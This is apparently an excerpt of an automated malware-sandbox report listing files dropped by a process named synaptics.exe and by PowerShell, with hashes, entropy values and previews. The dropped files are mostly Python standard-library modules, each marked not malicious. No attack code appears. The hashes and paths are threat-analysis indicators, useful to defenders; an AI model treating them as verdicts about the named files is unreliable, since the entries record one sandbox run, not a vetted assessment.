                                                                                                                                                                                                            Preview:o.......Z.,d.t.......................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...g.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.g.Z.d.d.d...d.d...Z.e...f.d d!..Z.G.d"d#..d#..Z G.d$d%..d%..Z!G.d&d'..d'e d.d(..Z"G.d)d*..d*e"d.d(..Z#e"d+d,....Z$e"d-d.....Z%e"d/d0....Z&e"d1d2....Z'e"d3d4....Z(e"d5d6....Z)e#e.d.d...d7d8......Z*e"d9d:....Z+e"d;d<....Z,e"d=d>....Z-G.d?d@..d@e d.d(..Z.G.dAdB..dB..Z/G.dCdD..dDe e!e/d.d(..Z0G.dEdF..dFe e!d.d(..Z1G.dGdH..dHe e!d.d(..Z2G.dIdJ..dJe e!e/d.d(..Z3dKdL..Z4G.dMdN..dNe d.d(..Z5G.dOdP..dPe5d.d(..Z6G.dQdR..dRe5d.d(..Z7G.dSdT..dTe6d.d(..Z8G.dUdV..dVe7d.d(..Z9G.dWdX..dXe7d.d(..Z:G.dYdZ..dZe6d.d(..Z;d[d\..Z<G.d]d^..d^e6d.d(..Z=G.d_d`..d`e6d.d(..Z>G.dadb..db..Z?G.dcdd..dd..Z@G.dedf..df..ZAg.dg..ZBg.dh..ZCeBeC..dig...ZDdjdk..ZEdldm..ZFdndo..ZGd.drds..ZHd.dudv..ZIg.dw..dxdyg.dz..ZJG.d{d|..d|e...ZKG.d}d~..d~e?eKd...ZLG.d.d...d.e6d.d(
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3712
                                                                                                                                                                                                            Entropy (8bit):5.568200782392551
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:N6lByWyhU9ShozDLcLmxESqc0Ic5k4CW76a0:N6lByWS2zECW3u4gD
                                                                                                                                                                                                            MD5:B80FCA4143B70F12E06B7453668E9AF0
                                                                                                                                                                                                            SHA1:5851CCC71587EE2736518369D6C1C045020EB144
                                                                                                                                                                                                            SHA-256:110067B171685850D3253DBA45531F11ADD81FB1CA5DC46BD419E0B738FA06D4
                                                                                                                                                                                                            SHA-512:F24C552497D682D5E288421AA7AE5AEA3A70FC7FC1208F48B497FFD594E891D55843B9CAE650E2698236CD97588100562B984AA85B735F9005F05A44424AAFA0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.d.d.d...d.d...Z.d.d.d...Z.d.d...Z.e.d.k.r4e.....d.S.d.S.).z.Implementation of the UUencode and UUdecode functions...encode(in_file, out_file [,name, mode], *, backtick=False).decode(in_file [, out_file, mode, quiet])......N)...Error..encode..decodec....................@...s....e.Z.d.Z.d.S.).r....N)...__name__..__module__..__qualname__..r....r.....1C:\Users\user\AppData\Local\xFSOj9El1Q\lib\uu.pyr....'...s........r....F....backtickc....................C...sx...g.}.z.|.d.k.r.t.j.j.}.n/t.|.t...r;|.d.u.r.t.j...|...}.|.d.u.r1z.t...|...j.}.W.n...t.y0......Y.n.w.t.|.d...}.|...|.....|.d.k.rDt.j.j.}.n.t.|.t...rSt.|.d...}.|...|.....|.d.u.rYd.}.|.d.u.r_d.}.|...d.d...}.|...d.d...}.|...d.|.d.@.|.f.....d.......|...d...}.t.|...d.k.r.|...t.j.|.|.d.......|...d...}.t.|...d.k.s.|.r.|...d.....n.|...d.....W.|.D.].}.|.......q.d.S.|.D.].}.|.......q.w.).z.Uuencode file..-N..rb..wbi.......z.\n...z.\rz.begin %o %s
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13670
                                                                                                                                                                                                            Entropy (8bit):5.379508169226183
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7Bo+bxHagj6xo0+t6p6l0y8pym5hlSxbFBdbvywKVv3dxZuC1J:7VFHagj6xLM6GaEbFBdryJ/dxZuC1J
                                                                                                                                                                                                            MD5:1FD81B78731A082606CA8EC2625B4A43
                                                                                                                                                                                                            SHA1:6F2407F8224BB58C2E9F0CC1A36A602E99F4249D
                                                                                                                                                                                                            SHA-256:EC446A5794F143054B6D4B31462B5E6DD8C4A01BA0C93BF74850A33F93CFF956
                                                                                                                                                                                                            SHA-512:462F5CC73DD492F374AD98BAAB38F4E4CDB04A881EFE7AEEFE5D2DE3F5421836B062ACDE1C8176FE289363F867F7EE068A25F9511D1E7BD8F11A6C057B46C51F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d=d.d...Z.d>d.d...Z.d.d...Z.d.d...Z.e.Z.d.d...Z.e.Z.d.d...Z.d.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d?d)d*..Z.....d@d+d,..Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.d1d2..Z.z.d.d3l.m.Z.m Z m!Z!m.Z.m.Z.m"Z"..e Z#e!Z$d4Z%W.n...e&y.......g.Z.d5Z#i.Z$d(a'd6d7..Z"d.Z%Y.n.w.e.e.j(....e%s.e)e.d8..s.e.d5e*d9d(d:....e.d;e*d(d<....e.d;e+d(d<....e.d;e,d(d<....e.d;e-d(d<....[%d.S.)Az&Python part of the warnings subsystem......N)...warn..warn_explicit..showwarning..formatwarning..filterwarnings..simplefilter..resetwarnings..catch_warningsc....................C...s....t.|.|.|.|.|.|...}.t.|.....d.S.)..7Hook to write a warning to a file; replace if you like.N)...WarningMessage.._showwarnmsg_impl)...message..category..filename..lineno..file..line..msg..r.....7C:\Users\user\AppData\Local\xFSOj9El1Q\lib\warnings.pyr........s........r....c....................C...s....t.|.|.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20367
                                                                                                                                                                                                            Entropy (8bit):5.08430069875515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:tjNLmhczEtRkD2ofjXd7AMlM/DgWryRjKj8j/XBNOjEUWYh1xL0D:tpmhWSRkSUXd7xyDDyDjOjbWISD
                                                                                                                                                                                                            MD5:B996D336E1774CA1D3633215FB473155
                                                                                                                                                                                                            SHA1:DB2155B4E78ABEBBC61CEAF80CE404D4BE6966A5
                                                                                                                                                                                                            SHA-256:E628D8E6863975D0716F4ED4E38862DA57FB9253D69BBCC5DC7E3A41B5473C48
                                                                                                                                                                                                            SHA-512:CBABEE83EED0F23429C4171D2C51B292DDEDFE037D5B2D8D9F2C16205552BA8FF32A4E5F3D4C00C7C061CEFCEFE1C8A05F406FB1D9736A0CC78153EE39DFE98C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.V.......................@...s....d.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.e.f.Z.g.d...Z.e.j...e.....e.j...e.....G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e.j...Z.G.d.d...d...Z.d.S.).z|Weak reference support for Python...This module is an implementation of PEP 205:..https://www.python.org/dev/peps/pep-0205/......)...getweakrefcount..getweakrefs..ref..proxy..CallableProxyType..ProxyType..ReferenceType.._remove_dead_weakref)...WeakSet.._IterationGuardN).r....r....r....r......WeakKeyDictionaryr....r....r......ProxyTypes..WeakValueDictionaryr......WeakMethod..finalizec........................sD...e.Z.d.Z.d.Z.d.Z.d.d.d...Z...f.d.d...Z.d.d...Z.d.d...Z.e.j.Z.....Z.S.).r....z.. A custom `weakref.ref` subclass which simulates a weak reference to. a bound method, working around the lifetime problem of bound methods.. )..._func_ref.._meth_type.._alive..__weakref__Nc........................sx...z.|.j.}.|.j.}.W.n...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61059
                                                                                                                                                                                                            Entropy (8bit):5.527627295914353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:X5DKf6qzuikPr038uc4PT1+Y9sW1EynK5c7z0p+YHiBZ:JnqyPr0dhXFAp76
                                                                                                                                                                                                            MD5:DAC959F3BD7AFDB217A327647695FD35
                                                                                                                                                                                                            SHA1:86E47D053B3D2918C2A8663A016513884DEBB272
                                                                                                                                                                                                            SHA-256:3C822554F595345D72082244B370AB49523849F82BA565D5D13DC6BAE0D82FF1
                                                                                                                                                                                                            SHA-512:9461B37B4EAD4F3C68A6167AA47929E690F58FD07581AEBB0717781AFD2B284C14466B45269B6DFB745A5FB3EBD43C8DCAE041B3D895C4116C4814F0D97772C9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61059
                                                                                                                                                                                                            Entropy (8bit):5.527627295914353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:X5DKf6qzuikPr0x8uc4PT1+Y9sW1EynK5c7z0p+YHiBZ:JnqyPr0DhXFAp76
                                                                                                                                                                                                            MD5:3B2544D4E5610668B9A4618CF336F8FE
                                                                                                                                                                                                            SHA1:08F3DBE2504C75CBD3A1BA0153CA802CB6C17CFC
                                                                                                                                                                                                            SHA-256:1428E275476516EBFA0F4361BF8D790110AB227B14F7F9F751AABF5232E1721E
                                                                                                                                                                                                            SHA-512:5C298AA5FA3E1BC31DFE9F2C43DB483B82F5D8AFFCDC2DE4919D2BD4E56A3D2063B1EF8C0B021540D0128043E85A4D5DF3A9774E5EE0B5B6C4881A6842133D5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:o.......Z.,d.g.......................@...sD...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.e.j.Z.W.n...e.yQ......d.Z.e.j.Z.Y.n.w.z.d.d.l.Z.W.n...e.yc......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.yu......d.Z.Y.n.w.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e...Z.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(e..)e'..Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6e..)e5..Z7d.Z8d.Z9d.Z:d.Z;d.Z<d.Z=d.Z>d.Z?d.Z@d.ZAd.ZBd.ZCd.ZDd.ZEd.ZFd ZGd!ZHd"ZId#ZJd$ZKd%ZLe..)eK..ZMd.ZNd.ZOd.ZPd.ZQd.ZRd.ZSd.ZTd.ZUd.ZVd.ZWd.ZXd.ZYd&ZZd'Z[e..)eZ..Z\d(Z]d)Z^e..)e]..Z_d.Z`d.Zad.Zbd.Zcd.Zdd.Zed.Zfd.Zgd.Zhd.Zid*Zje..kd+..Zld,d-..Zmd.d/..Znd0d1..Zod2d3..Zpd4d5..ZqG.d6d7..d7er..Zsd.atd8d9..Zud:d;..ZvG.d<d=..d=..ZwG.d>d?..d?..Zxi.d.d@..d.dA..d.dB..d.dB..d.dB..d.dB..d.dC..d.dD..d.dE..d.dF..d.dC..d.dG..d.dH..d#dI..dJdK..dLdM..dNdO..ZydPdQ..ZzdsdRdS..Z{dTdU..Z|G.dVdW..dW..Z}G.dXdY..dY..Z~G.dZd[..d[e.j...Z.G.d\d]..d]e.j...Z.G.d^d_..d_..Z.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6710
                                                                                                                                                                                                            Entropy (8bit):4.481959964393442
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:gPAaxlPl/yqe//e/2Dkpps4BWt3O0Tml91BbnTLikZOz9Cj9bObNbYGO7U:gPAaxlP1u9kU+0TmnTLikZW9CxbOJbYQ
                                                                                                                                                                                                            MD5:3A8E484DC1F9324075F1E574D7600334
                                                                                                                                                                                                            SHA1:D70E189BA3A4CF9BEA21A1BBC844479088BBD3A0
                                                                                                                                                                                                            SHA-256:A63DE23D93B7CC096AE5DF79032DC2E12778B134BB14F7F40AC9A1F77F102577
                                                                                                                                                                                                            SHA-512:2C238B25DD1111EE37A3D7BF71022FE8E6C1D7ECE86B6BBDFA33EE0A3F2A730590FE4BA86CC88F4194D60F419F0FEF09776E5ECA1C473D3F6727249876F00441
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) according to PEP 3119."""......def abstractmethod(funcobj):.. """A decorator indicating abstract methods..... Requires that the metaclass is ABCMeta or derived from it. A.. class that has a metaclass derived from ABCMeta cannot be.. instantiated unless all of its abstract methods are overridden... The abstract methods can be called using any of the normal.. 'super' call mechanisms. abstractmethod() may be used to declare.. abstract methods for properties and descriptors..... Usage:.... class C(metaclass=ABCMeta):.. @abstractmethod.. def my_abstract_method(self, ...):.. ..... """.. funcobj.__isabstractmethod__ = True.. return funcobj......class abstractclassmethod(classmethod):.. """A decorator indicating abstract classmethods..... Deprecated, use 'classmethod' with 'ab
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33552
                                                                                                                                                                                                            Entropy (8bit):4.4638619417349945
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Ob3TMIq3JHejezqFTYQjJFUT2uXUmwlKje3W73igkZIS3WXpRY:4MHpejezqF0gAT2u/NK3W7Dk9cY
                                                                                                                                                                                                            MD5:BF5911BEAF58D01F1317D4416B929EED
                                                                                                                                                                                                            SHA1:4D6191C34468BCDEDBDFF0CFE1EB7F44A83BAB27
                                                                                                                                                                                                            SHA-256:2EFBA033EF47B3E19DBCDCB6762B9B49AB1982EAE3B9D649548D15AFADC78DAF
                                                                                                                                                                                                            SHA-512:B88E727115CEFDFD31498370DACD7FF3ADBF3BD511B06367CB6A9513B5419A6B1A2A83822561E11BF6B41BC6A7AFED4ACBFC542F18CAFE18E741E576380E234D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Stuff to parse AIFF-C and AIFF files.....Unless explicitly stated otherwise, the description below is true..both for AIFF-C files and AIFF files.....An AIFF-C file has the following structure..... +-----------------+.. | FORM |.. +-----------------+.. | <size> |.. +----+------------+.. | | AIFC |.. | +------------+.. | | <chunks> |.. | | . |.. | | . |.. | | . |.. +----+------------+....An AIFF file has the string "AIFF" instead of "AIFC".....A chunk consists of an identifier (4 bytes) followed by a size (4 bytes,..big endian order), followed by the data. The size field does not include..the size of the 8 byte header.....The following chunk types are recognized..... FVER.. <version number of AIFF-C defining document> (AIFF-C only)... MARK.. <# of markers> (2 bytes).. list of markers:.. <marker ID> (2 bytes, must be > 0).. <position> (4 bytes).. <marker nam
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):517
                                                                                                                                                                                                            Entropy (8bit):5.2580863991460935
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:HHoBI/BiIkjuVyGkjvluzAbx1uVEiE9rBX2y:HzJiOVyGkRuYSkVX2y
                                                                                                                                                                                                            MD5:3ED5C3D928783BE91A9C8FCA6BCB846E
                                                                                                                                                                                                            SHA1:2104F146AA389C6FC4BF172A082A711F9515A1EE
                                                                                                                                                                                                            SHA-256:2C4879A527D2F5D0E0F0D81837EEB8510E2F77FDF2BBB2688835732E699CCD6A
                                                                                                                                                                                                            SHA-512:2BC5200EF030A876C374AD3A31D189777C3C57759C6DB0BAB3C33265BB74ADD2FDDAAE20EDC646A7722386934D093C47C42CFC8AF24A5340C7D8D926A9D3505F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..import webbrowser..import hashlib....webbrowser.open("https://xkcd.com/353/")....def geohash(latitude, longitude, datedow):.. '''Compute geohash() using the Munroe algorithm..... >>> geohash(37.421542, -122.085589, b'2005-05-26-10458.68').. 37.857713 -122.544543.... '''.. # https://xkcd.com/426/.. h = hashlib.md5(datedow, usedforsecurity=False).hexdigest().. p, q = [('%f' % float.fromhex('0.' + x)) for x in (h[:16], h[16:32])].. print('%d%s %d%s' % (latitude, p[1:], longitude, q[1:]))..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101137
                                                                                                                                                                                                            Entropy (8bit):4.306533315342896
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:g3gKb2hiBVRLsxQ4vu6ilEy14udYC91vhjJFGD8:gQKb2hiBVabu6ilEy14udx1vJJFGA
                                                                                                                                                                                                            MD5:5CDD2DD02315B6DD0F093C4D785E3D96
                                                                                                                                                                                                            SHA1:06057E30C7F3E7804070A90739C3577FFB9B5AD6
                                                                                                                                                                                                            SHA-256:D30F7E5CA4A44F7BA9F1626E984B7099B42FEB603B9BA8E31635D9C889793EC1
                                                                                                                                                                                                            SHA-512:10D6E90BC739158597CF8AEA1616D8B02C2B72AD8EFADE9B3668A952179CC2A9AB5B92EDECB174821556F52EA0A9081575C90D2016DBFF6175D1F3E0A0F2284D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:# Author: Steven J. Bethard <steven.bethard@gmail.com>...# New maintainer as of 29 August 2019: Raymond Hettinger <raymond.hettinger@gmail.com>...."""Command-line parsing library....This module is an optparse-inspired command-line parsing library that:.... - handles both optional and positional arguments.. - produces highly informative usage messages.. - supports parsers that dispatch to sub-parsers....The following is a simple usage example that sums integers from the..command-line and writes the result to a file::.... parser = argparse.ArgumentParser(.. description='sum the integers at the command line').. parser.add_argument(.. 'integers', metavar='int', nargs='+', type=int,.. help='an integer to be summed').. parser.add_argument(.. '--log', default=sys.stdout, type=argparse.FileType('w'),.. help='the file where the sum should be written').. args = parser.parse_args().. args.log.write('%s' % sum(args.integers)).. args.lo
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61609
                                                                                                                                                                                                            Entropy (8bit):4.417126699054812
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:pZuW0/yNX9e8T1Y+XqfdAyr8+gliw1RaDh1:pZnMyNX9/qeyI+glN1s1
                                                                                                                                                                                                            MD5:38ECD2B58AF252AC5A2D14A5AC17333B
                                                                                                                                                                                                            SHA1:F5EC2EE9D098AF6432017029E2B14B0230581ADF
                                                                                                                                                                                                            SHA-256:A1D8E96B987376D7E0CE57587830EBAA7E06509EA528D666B409D5604D1EAA8D
                                                                                                                                                                                                            SHA-512:BACE88F6DA88662BBC5A49E6617478553C2FE287CE1D46CCA77483F63FBE82849EBA45824CEE7AA57FF4F820F1024E331AF51FE46E353535D9D68160DA424848
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:""".. ast.. ~~~.... The `ast` module helps Python applications to process trees of the Python.. abstract syntax grammar. The abstract syntax itself might change with.. each Python release; this module helps to find out programmatically what.. the current grammar looks like and allows modifications of it..... An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as.. a flag to the `compile()` builtin function or by using the `parse()`.. function from this module. The result will be a tree of objects whose.. classes all inherit from `ast.AST`..... A modified abstract syntax tree can be compiled into a Python code object.. using the built-in `compile()` function..... Additionally various helper functions are provided that make working with.. the trees simpler. The main intention of the helper functions and this.. module in general is to provide an easy to use interface for libraries.. that work tightly with the python sy
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11835
                                                                                                                                                                                                            Entropy (8bit):4.533400669114703
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:jrq3jJ1vi4b1/AwyG5XcoIhlJCmO7IDzAEyeWdm2aIb:fq3jJRthARG9comK7KzAEyeWdm4
                                                                                                                                                                                                            MD5:A089EF65FD800EEB88D57F8752C14409
                                                                                                                                                                                                            SHA1:31ADE2E4DEDE4D6B60CCA9A484858A5552A0E533
                                                                                                                                                                                                            SHA-256:8F64AACF08D17F0D9EE51BBB540A5D2662ACB0F7C68009E895AC39D8973039A4
                                                                                                                                                                                                            SHA-512:8D3DC6975E0DA00046C867E77D5C33D3197A7D4A5E5CECD43DC31B35C4D32B300BB3201A82AF4919A6A084A3540AD61DEC521DE7F405742BF6C323AA5047F6B9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:# -*- Mode: Python; tab-width: 4 -*-..# Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, IND
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):76275
                                                                                                                                                                                                            Entropy (8bit):4.2838788564183705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:5D12q1xBrDejWTB0O41J7mLR+hQ8qt3oaV6v2Q2Njn3cy:5D12JK41J7mLR+W8qt3ldQ2Njd
                                                                                                                                                                                                            MD5:24F48F139D38A78E5515C454EA98D8CB
                                                                                                                                                                                                            SHA1:0A4F6F48D7900907554917984EE7A47E53B96BC2
                                                                                                                                                                                                            SHA-256:B68EA5F7927AC3CE2420CBB8AAD81703305174C3B8FA7C91B03E28204980518A
                                                                                                                                                                                                            SHA-512:C9E64F95689E7A05189CDBCA9F9471E32047EB039A59847CD4B70E21C6C4DA58F435A2841E404625C460791AE1C5829D68D0DEF93AA94904CB834B15AFF98FC8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Preview:"""Base implementation of event loop.....The event loop can be broken up into a multiplexer (the part..responsible for notifying us of I/O events) and the event loop proper,..which wraps a multiplexer with functionality for scheduling callbacks,..immediately or at a given time in the future.....Whenever a public API takes a callback, subsequent positional..arguments will be passed to the callback if/when it is called. This..avoids the proliferation of trivial lambdas implementing closures...Keyword arguments for the callback are not supported; this is a..conscious design decision, leaving the door open for keyword arguments..to modify the meaning of the API call itself..."""....import collections..import collections.abc..import concurrent.futures..import functools..import heapq..import itertools..import os..import socket..import stat..import subprocess..import threading..import time..import traceback..import sys..import warnings..import weakref....try:.. import ssl..except ImportEr
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2654
                                                                                                                                                                                                            Entropy (8bit):4.667101233843207
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:yeCRipB7FG3NtCPfOM3TW+yWzpBSl8Wa0IArhTPUXURtXlSxBKbb2z:ye1euZPzpAl8vArp98G2z
                                                                                                                                                                                                            MD5:216B4AF2D0F26C3586C808566034E664
                                                                                                                                                                                                            SHA1:2BC9919D41AE6C08E3ACDD9B5DCD357673040E85
                                                                                                                                                                                                            SHA-256:0F55E981F522D382F8F24848D6BE34E8E0144CF813D07035FCDD768713F6A863
                                                                                                                                                                                                            SHA-512:C8C0DFE087FA85E3924A3967BE09E90EAD65084DB0C0B455BBF4FDFAF34DFD274356C700902012B0AE0A631514EDB099C5CC04DA606CC0CC049D1E32E753FDEA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
